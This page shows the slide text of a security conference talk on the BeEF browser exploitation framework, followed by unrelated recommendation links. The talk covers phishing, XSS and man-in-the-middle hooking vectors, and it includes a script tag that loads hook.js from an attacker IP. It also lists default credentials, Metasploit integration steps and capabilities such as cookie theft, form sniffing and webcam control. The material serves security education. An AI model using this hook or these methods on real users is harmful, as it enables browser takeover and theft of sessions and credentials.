Abstract image of a woman sitting on books and studying on a laptop

Advanced Client Side Exploitation Using BeEF

Download as PPTX, PDF
1
1N3

The document provides an overview of the Browser Exploitation Framework (BeEF). It discusses how BeEF allows an attacker to control victims' browsers remotely by injecting a small JavaScript hook. This can enable the attacker to profile the victim's system, steal session cookies, redirect the browser, and run exploits or malware payloads. The document outlines how BeEF is installed and used, describes common attack vectors for injecting the hook like phishing and XSS, and demonstrates fingerprinting and attacking capabilities through its web interface modules.

Technology
Related topics:
Social Engineering
1 of 39
Downloaded 112 times
1
2
Most read
3
4
5
6
Most read
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Most read
26
27
28
29
30
31
32
33
34
35
36
37
38
39
Man In The Browser Advanced Client-Side Exploitation with BeEF 1N3 | @CrowdShield | https://crowdshield.com ISSA Phoenix Chapter, 04/11/2017
Introduction • Sr. Penetration Tester at Early Warning • 16+ years of IT experience with a heavy focus on IT Security • Symantec/NYS Cyber Security Agency, nCircle/Tripwire, General Electric • Degree in Computer Science • OSCP, ASFP, CISSP, PCI-ASV, Security+, Network+, A+, MCP, CNA • Bug Bounty Researcher on BugCrowd and HackerOne • Founder of CrowdShield (@CrowdShield) https://crowdshield.com
Overview • What is BeEF? • Getting started • Browser hooking • Attack vectors/exploits & examples • Demo • Q & A
What is BeEF? • Short for “Browser Exploitation Framework” • At a basic level, it allows an attacker to control a victims browser • Similar to Metasploit (modular exploit framework) but for exploiting browsers • Can be used to leverage existing vulnerabilities (XSS, CSRF, etc.) • In some cases, it can lead to full compromise of the victims PC
Getting Started • Installed by default on Kali Linux • Can also be downloaded from http://beefproject.com/ • App directory /usr/share/beef-xss/ • Startup script /etc/init.d/beef-xss <start|stop> • Web UI http://localhost:3000/ui/panel/ • Default user/pass: beef/beef
Logging In…
Hooking Browsers • Must be able to inject Javascript in target’s browser • <script src=“http://attackerip:3000/hook.js”></script> • Uses XHR (mostly transparent) polling to communicate with BeEF server
XHR Polling
Fundamentals • Cross-Site Scripting (XSS) allows arbitrary execution of client side code (ie. Javascript/HTML, etc.). Usually used by attackers to steal session cookies… • Cross-Site Request Forgery (CSRF) allows an attacker to initiate requests on behalf of other users (ie. Submitting a form to transfer funds $1,000 to an attackers account, etc.)
Attack Vectors • Social Engineering/Phishing - Lure or convince victim to attacker controlled server hosting BeeF • Open Redirect - Redirect victims automatically to attacker controlled server hosting BeeF • Reflected XSS - Send victim a URL that executes hook.js script • Stored XSS - Embed hook.js script via a stored XSS vector • Man-In-The-Middle Attacks - Injecting BeEF hook via MITM
Social Engineering Toolkit • Customized payload generation • Website Cloning • Email Template Generation • Mass Email Capabilities
Phishing & Social Engineering It only takes one wrong click…
Open Redirect
XSS Hooking BeeF hook.js injected via URL
URL Obfuscation Payloads and phishing links can be obfuscated and shortened using URL shorteners… (example: https://goo.gl/ZncYoc)
Stored XSS A single stored XSS flaw can yield many hooked clients depending on the size and use of the site…
Man-In-The-Middle Injects a small hook.js into every web request intercepted. Can also be done using DNS spoofing as well…
Web UI Tracks client connections (ie. hooked browsers) and allows an attacker to run modules
• Gather intel on target system/browser • Retrieve session cookies • Redirect target to malicious URL’s • Change site content • Form field sniffing • Embed hidden iframes • Alter original page content (HTML/JS) • Scan internal network (ping/port scans) • Launch CSRF attacks • Execute client-side exploits/code (BeeF/Metasploit/SET) BeeF Attacks
BeEF Modules
BeEF Basics
Browser Hacking Methodology • Gaining control • Fingerprinting • Retain control • Bypassing SOP • Attacking users • Attacking extensions • Attacking web applications • Attacking browsers • Attacking plugins • Attacking networks
Fingerprinting REQ-PEN-1234
Advanced Client Side Exploitation Using BeEF
Retain Control
Attacking Users Session Hijacking
Form Sniffing
Webcam Control
Client-Side Request Forgery • Can be used to make internal or external requests from the victim’s PC • Depending on severity, could allow an attacker to automatically transfer funds or reset a users passwords, etc…
CSRF Exploits
Tunneling Proxy
Internal Network Mapping
Integration • Execute Metasploit exploits directly through BeeF’s web UI… • Get Metasploit DB user/pass: msfconsole -x ‘load msgrpc;’ • Update Config with MSF DB user/pass: /usr/share/beef-xss/extensions/metasploit/config.yml • Enable the Metasploit module in BeeF config: /usr/share/beef-xss/config.yml
Exploits…
Exploiting Browsers Using Java
Automating Modules By editing autorun.rb, we can automatically load specific modules and set options whenever a new BeEF hook connects
Demo
Recommended Reading
Questions?

More Related Content

PPTX
Footprinting and reconnaissance
NishaYadav177
 
PDF
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
Christopher Frohoff
 
PDF
基于 FRIDA 的全平台逆向分析
CC
 
PDF
Secure coding guidelines
Zakaria SMAHI
 
PDF
Web Application Penetration Tests - Information Gathering Stage
Netsparker
 
PDF
CanSecWest 2017 - Port(al) to the iOS Core
Stefan Esser
 
PPTX
Botnet Detection in Online-social Network
Rubal Sagwal
 
PDF
SOCIAL NETWORK SECURITY
MarketingatBahrain
 
Footprinting and reconnaissance
NishaYadav177
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
Christopher Frohoff
 
基于 FRIDA 的全平台逆向分析
CC
 
Secure coding guidelines
Zakaria SMAHI
 
Web Application Penetration Tests - Information Gathering Stage
Netsparker
 
CanSecWest 2017 - Port(al) to the iOS Core
Stefan Esser
 
Botnet Detection in Online-social Network
Rubal Sagwal
 
SOCIAL NETWORK SECURITY
MarketingatBahrain
 

What's hot (20)

PPTX
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Adam Nurudini
 
PDF
Footprinting
Duah John
 
PDF
The Cross Site Scripting Guide
Daisuke_Dan
 
PPTX
Network Penetration Testing
Mohammed Adam
 
PPT
Web Services Hacking and Security
Blueinfy Solutions
 
PDF
CẢM NHẬN Về những giá trị văn hóa - lịch sử trong tác phẩm của nhà văn Hoàng ...
phamhieu56
 
PPTX
Cross Site Scripting (XSS)
Barrel Software
 
PPT
XSS and CSRF with HTML5
Shreeraj Shah
 
PDF
(Ficon2016) #2 침해사고 대응, 이렇다고 전해라
INSIGHT FORENSIC
 
PPTX
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
PDF
Windows Memory Forensic Analysis using EnCase
Takahiro Haruyama
 
PDF
Cyber Attack Methodologies
Geeks Anonymes
 
PDF
MacOS memory allocator (libmalloc) Exploitation
Angel Boy
 
PPT
Reliable Windows Heap Exploits
amiable_indian
 
PPTX
Deep dive into ssrf
n|u - The Open Security Community
 
PPT
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
PPT
Shared preferences
Sourabh Sahu
 
PPT
XSS - Attacks & Defense
Blueinfy Solutions
 
PPTX
File upload vulnerabilities & mitigation
Onwukike Chinedu. CISA, CEH, COBIT5 LI, CCNP
 
PPTX
Operating Systems: Computer Security
Damian T. Gordon
 
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Adam Nurudini
 
Footprinting
Duah John
 
The Cross Site Scripting Guide
Daisuke_Dan
 
Network Penetration Testing
Mohammed Adam
 
Web Services Hacking and Security
Blueinfy Solutions
 
CẢM NHẬN Về những giá trị văn hóa - lịch sử trong tác phẩm của nhà văn Hoàng ...
phamhieu56
 
Cross Site Scripting (XSS)
Barrel Software
 
XSS and CSRF with HTML5
Shreeraj Shah
 
(Ficon2016) #2 침해사고 대응, 이렇다고 전해라
INSIGHT FORENSIC
 
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
Windows Memory Forensic Analysis using EnCase
Takahiro Haruyama
 
Cyber Attack Methodologies
Geeks Anonymes
 
MacOS memory allocator (libmalloc) Exploitation
Angel Boy
 
Reliable Windows Heap Exploits
amiable_indian
 
Deep dive into ssrf
n|u - The Open Security Community
 
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
Shared preferences
Sourabh Sahu
 
XSS - Attacks & Defense
Blueinfy Solutions
 
File upload vulnerabilities & mitigation
Onwukike Chinedu. CISA, CEH, COBIT5 LI, CCNP
 
Operating Systems: Computer Security
Damian T. Gordon
 
Ad

Similar to Advanced Client Side Exploitation Using BeEF (20)

PPTX
Beef saurabh
Saurav Chaudhary
 
PDF
Be ef presentation-securitybyte2011-michele_orru
Michele Orru
 
ODP
Browser Exploitation Framework Tutorial
imlaurel2
 
PDF
Hacktivity2011 be ef-preso_micheleorru
Michele Orru
 
PDF
BeEF_EUSecWest-2012_Michele-Orru
Michele Orru
 
PDF
Antisnatchor all you ever wanted to know about beef
DefconRussia
 
PDF
ZeroNights2012_BeEF_Workshop_antisnatchor
Michele Orru
 
PDF
DeepSec2011_GroundBeEF
Michele Orru
 
PDF
Owasp AppSecEU 2015 - BeEF Session
Bart Leppens
 
PDF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
PDF
Browser Exploit Framework
n|u - The Open Security Community
 
PPTX
Browser exploit framework
Prashanth Sivarajan
 
PDF
Advances in BeEF - AthCon2012
Michele Orru
 
PDF
BeEF
AlexandraLacatus
 
PDF
I'm the butcher would you like some BeEF
Michele Orru
 
PDF
Burp suite
Yashar Shahinzadeh
 
PDF
ZN27112015
Denis Kolegov
 
PPTX
OWASP San Diego Training Presentation
owaspsd
 
PDF
Web Application Penetration Testing.pdf
barayapaten
 
PDF
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Christian Frichot
 
Beef saurabh
Saurav Chaudhary
 
Be ef presentation-securitybyte2011-michele_orru
Michele Orru
 
Browser Exploitation Framework Tutorial
imlaurel2
 
Hacktivity2011 be ef-preso_micheleorru
Michele Orru
 
BeEF_EUSecWest-2012_Michele-Orru
Michele Orru
 
Antisnatchor all you ever wanted to know about beef
DefconRussia
 
ZeroNights2012_BeEF_Workshop_antisnatchor
Michele Orru
 
DeepSec2011_GroundBeEF
Michele Orru
 
Owasp AppSecEU 2015 - BeEF Session
Bart Leppens
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
Browser Exploit Framework
n|u - The Open Security Community
 
Browser exploit framework
Prashanth Sivarajan
 
Advances in BeEF - AthCon2012
Michele Orru
 
BeEF
AlexandraLacatus
 
I'm the butcher would you like some BeEF
Michele Orru
 
Burp suite
Yashar Shahinzadeh
 
ZN27112015
Denis Kolegov
 
OWASP San Diego Training Presentation
owaspsd
 
Web Application Penetration Testing.pdf
barayapaten
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Christian Frichot
 
Ad

Recently uploaded (20)

PPTX
Information-Technology-in-Human-Society.pptx
744tusharsingh094
 
PPTX
How to use fields_get method in Odoo 18
Celine George
 
PPTX
Presentation - Principles of Instructional Design.pptx
Ntokozo Mhlongo
 
PPTX
How to Convert Tickets Into Sales Opportunity in Odoo 18
Celine George
 
PDF
CCUS-as-the-Missing-Link-to-Net-Zero_AksCurious.pdf
AkarshaSrivastava1
 
PDF
Addressing the challenges of harmonizing law and artificial intelligence tech...
IAESIJAI
 
PDF
GDG Cloud Southlake #45: Patrick Debois: The Impact of GenAI on Development a...
James Anderson
 
PDF
Advancements in abstractive text summarization: a deep learning approach
IAESIJAI
 
PPTX
From XAI to XEE through Influence and Provenance.Controlling model fairness o...
Paolo Missier
 
PPTX
Information-Technology-in-Human-Society (2).pptx
744tusharsingh094
 
PDF
EGCB_Solar_Project_Presentation_and Finalcial Analysis.pdf
TaukirIslam
 
PDF
Introduction to MCP and A2A Protocols: Enabling Agent Communication
Maxim Salnikov
 
PPTX
Digital Convergence: How GIS, BIM, and CAD Revolutionize Asset Management
Richard Chappell, GISP
 
PPTX
Strategic Picks — Prioritising the Right Agentic Use Cases [2/6]
suhanisingh58689
 
PDF
Intravenous drug administration application for pediatric patients via augmen...
IAESIJAI
 
PDF
Optimizing bioinformatics applications: a novel approach with human protein d...
IAESIJAI
 
PDF
Connector Corner: Transform Unstructured Documents with Agentic Automation
DianaGray10
 
PDF
AI.gov: A Trojan Horse in the Age of Artificial Intelligence
Michael Weaver
 
PDF
Chapter 1: computer maintenance and troubleshooting
BarnootaKomputeraaaf
 
PDF
Technical Debt in the AI Coding Era - By Antonio Bianco
davanacorona
 
Information-Technology-in-Human-Society.pptx
744tusharsingh094
 
How to use fields_get method in Odoo 18
Celine George
 
Presentation - Principles of Instructional Design.pptx
Ntokozo Mhlongo
 
How to Convert Tickets Into Sales Opportunity in Odoo 18
Celine George
 
CCUS-as-the-Missing-Link-to-Net-Zero_AksCurious.pdf
AkarshaSrivastava1
 
Addressing the challenges of harmonizing law and artificial intelligence tech...
IAESIJAI
 
GDG Cloud Southlake #45: Patrick Debois: The Impact of GenAI on Development a...
James Anderson
 
Advancements in abstractive text summarization: a deep learning approach
IAESIJAI
 
From XAI to XEE through Influence and Provenance.Controlling model fairness o...
Paolo Missier
 
Information-Technology-in-Human-Society (2).pptx
744tusharsingh094
 
EGCB_Solar_Project_Presentation_and Finalcial Analysis.pdf
TaukirIslam
 
Introduction to MCP and A2A Protocols: Enabling Agent Communication
Maxim Salnikov
 
Digital Convergence: How GIS, BIM, and CAD Revolutionize Asset Management
Richard Chappell, GISP
 
Strategic Picks — Prioritising the Right Agentic Use Cases [2/6]
suhanisingh58689
 
Intravenous drug administration application for pediatric patients via augmen...
IAESIJAI
 
Optimizing bioinformatics applications: a novel approach with human protein d...
IAESIJAI
 
Connector Corner: Transform Unstructured Documents with Agentic Automation
DianaGray10
 
AI.gov: A Trojan Horse in the Age of Artificial Intelligence
Michael Weaver
 
Chapter 1: computer maintenance and troubleshooting
BarnootaKomputeraaaf
 
Technical Debt in the AI Coding Era - By Antonio Bianco
davanacorona
 

Advanced Client Side Exploitation Using BeEF

  • 1. Man In The Browser Advanced Client-Side Exploitation with BeEF 1N3 | @CrowdShield | https://crowdshield.com ISSA Phoenix Chapter, 04/11/2017
  • 2. Introduction • Sr. Penetration Tester at Early Warning • 16+ years of IT experience with a heavy focus on IT Security • Symantec/NYS Cyber Security Agency, nCircle/Tripwire, General Electric • Degree in Computer Science • OSCP, ASFP, CISSP, PCI-ASV, Security+, Network+, A+, MCP, CNA • Bug Bounty Researcher on BugCrowd and HackerOne • Founder of CrowdShield (@CrowdShield) https://crowdshield.com
  • 3. Overview • What is BeEF? • Getting started • Browser hooking • Attack vectors/exploits & examples • Demo • Q & A
  • 4. What is BeEF? • Short for “Browser Exploitation Framework” • At a basic level, it allows an attacker to control a victims browser • Similar to Metasploit (modular exploit framework) but for exploiting browsers • Can be used to leverage existing vulnerabilities (XSS, CSRF, etc.) • In some cases, it can lead to full compromise of the victims PC
  • 5. Getting Started • Installed by default on Kali Linux • Can also be downloaded from http://beefproject.com/ • App directory /usr/share/beef-xss/ • Startup script /etc/init.d/beef-xss <start|stop> • Web UI http://localhost:3000/ui/panel/ • Default user/pass: beef/beef
  • 7. Hooking Browsers • Must be able to inject Javascript in target’s browser • <script src=“http://attackerip:3000/hook.js”></script> • Uses XHR (mostly transparent) polling to communicate with BeEF server
  • 9. Fundamentals • Cross-Site Scripting (XSS) allows arbitrary execution of client side code (ie. Javascript/HTML, etc.). Usually used by attackers to steal session cookies… • Cross-Site Request Forgery (CSRF) allows an attacker to initiate requests on behalf of other users (ie. Submitting a form to transfer funds $1,000 to an attackers account, etc.)
  • 10. Attack Vectors • Social Engineering/Phishing - Lure or convince victim to attacker controlled server hosting BeeF • Open Redirect - Redirect victims automatically to attacker controlled server hosting BeeF • Reflected XSS - Send victim a URL that executes hook.js script • Stored XSS - Embed hook.js script via a stored XSS vector • Man-In-The-Middle Attacks - Injecting BeEF hook via MITM
  • 11. Social Engineering Toolkit • Customized payload generation • Website Cloning • Email Template Generation • Mass Email Capabilities
  • 12. Phishing & Social Engineering It only takes one wrong click…
  • 14. XSS Hooking BeeF hook.js injected via URL
  • 15. URL Obfuscation Payloads and phishing links can be obfuscated and shortened using URL shorteners… (example: https://goo.gl/ZncYoc)
  • 16. Stored XSS A single stored XSS flaw can yield many hooked clients depending on the size and use of the site…
  • 17. Man-In-The-Middle Injects a small hook.js into every web request intercepted. Can also be done using DNS spoofing as well…
  • 18. Web UI Tracks client connections (ie. hooked browsers) and allows an attacker to run modules
  • 19. • Gather intel on target system/browser • Retrieve session cookies • Redirect target to malicious URL’s • Change site content • Form field sniffing • Embed hidden iframes • Alter original page content (HTML/JS) • Scan internal network (ping/port scans) • Launch CSRF attacks • Execute client-side exploits/code (BeeF/Metasploit/SET) BeeF Attacks
  • 22. Browser Hacking Methodology • Gaining control • Fingerprinting • Retain control • Bypassing SOP • Attacking users • Attacking extensions • Attacking web applications • Attacking browsers • Attacking plugins • Attacking networks
  • 29. Client-Side Request Forgery • Can be used to make internal or external requests from the victim’s PC • Depending on severity, could allow an attacker to automatically transfer funds or reset a users passwords, etc…
  • 33. Integration • Execute Metasploit exploits directly through BeeF’s web UI… • Get Metasploit DB user/pass: msfconsole -x ‘load msgrpc;’ • Update Config with MSF DB user/pass: /usr/share/beef-xss/extensions/metasploit/config.yml • Enable the Metasploit module in BeeF config: /usr/share/beef-xss/config.yml
  • 36. Automating Modules By editing autorun.rb, we can automatically load specific modules and set options whenever a new BeEF hook connects
  • 37. Demo